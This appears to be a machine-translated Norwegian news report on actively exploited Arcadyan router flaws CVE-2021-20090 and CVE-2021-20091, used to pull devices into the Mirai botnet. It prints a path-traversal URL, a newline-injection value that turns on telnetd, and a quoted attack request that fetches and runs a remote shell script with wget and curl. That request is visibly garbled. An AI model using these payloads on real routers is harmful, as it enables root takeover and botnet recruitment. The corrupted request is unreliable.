Et massivt angrep er registrert på nettverket mot hjemmerutere hvis fastvare bruker en HTTP-serverimplementering fra Arcadyan-selskapet. For å få kontroll over enheter brukes en kombinasjon av to sårbarheter som tillater ekstern kjøring av vilkårlig kode med rotrettigheter. Problemet påvirker et ganske bredt spekter av ADSL-rutere fra Arcadyan, ASUS og Buffalo, samt enheter levert under Beeline-merkene (problemet er bekreftet i Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone og andre teleoperatører. Det bemerkes at problemet har vært tilstede i Arcadyan-firmware i mer enn 10 år og har i løpet av denne tiden klart å migrere til minst 20 enhetsmodeller fra 17 forskjellige produsenter.
Den første sårbarheten, CVE-2021-20090, gjør det mulig å få tilgang til et hvilket som helst webgrensesnittskript uten autentisering. Essensen av sårbarheten er at i nettgrensesnittet er noen kataloger som bilder, CSS-filer og JavaScript-skript sendes gjennom, tilgjengelige uten autentisering. I dette tilfellet kontrolleres kataloger som tilgang uten autentisering er tillatt ved å bruke startmasken. Å spesifisere "../"-tegn i stier for å gå til den overordnede katalogen blokkeres av fastvaren, men bruk av "..%2f"-kombinasjonen hoppes over. Dermed er det mulig å åpne beskyttede sider når du sender forespørsler som "http://192.168.1.1/images/..%2findex.htm".
Den andre sårbarheten, CVE-2021-20091, lar en autentisert bruker gjøre endringer i systeminnstillingene til enheten ved å sende spesialformaterte parametere til application_abstract.cgi-skriptet, som ikke sjekker for tilstedeværelsen av et linjeskifttegn i parameterne . For eksempel, når du utfører en ping-operasjon, kan en angriper spesifisere verdien "192.168.1.2%0AARC_SYS_TelnetdEnable=1" i feltet med IP-adressen som er sjekket, og skriptet, når du oppretter innstillingsfilen /tmp/etc/config/ .glbcfg, vil skrive linjen "AARC_SYS_TelnetdEnable=1" inn i den ", som aktiverer telnetd-serveren, som gir ubegrenset kommandoskalltilgang med rotrettigheter. På samme måte, ved å angi AARC_SYS-parameteren, kan du kjøre hvilken som helst kode på systemet. Den første sårbarheten gjør det mulig å kjøre et problematisk skript uten autentisering ved å få tilgang til det som "/images/..%2fapply_abstract.cgi".
For å utnytte sårbarheter må en angriper kunne sende en forespørsel til nettverksporten som nettgrensesnittet kjører på. Å dømme etter dynamikken i spredningen av angrepet, lar mange operatører tilgang på enhetene sine fra det eksterne nettverket for å forenkle diagnostiseringen av problemer av støttetjenesten. Hvis tilgangen til grensesnittet kun er begrenset til det interne nettverket, kan et angrep utføres fra et eksternt nettverk ved å bruke "DNS rebinding"-teknikken. Sårbarheter brukes allerede aktivt for å koble rutere til Mirai-botnettet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Tilkobling: lukk User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Kilde: opennet.ru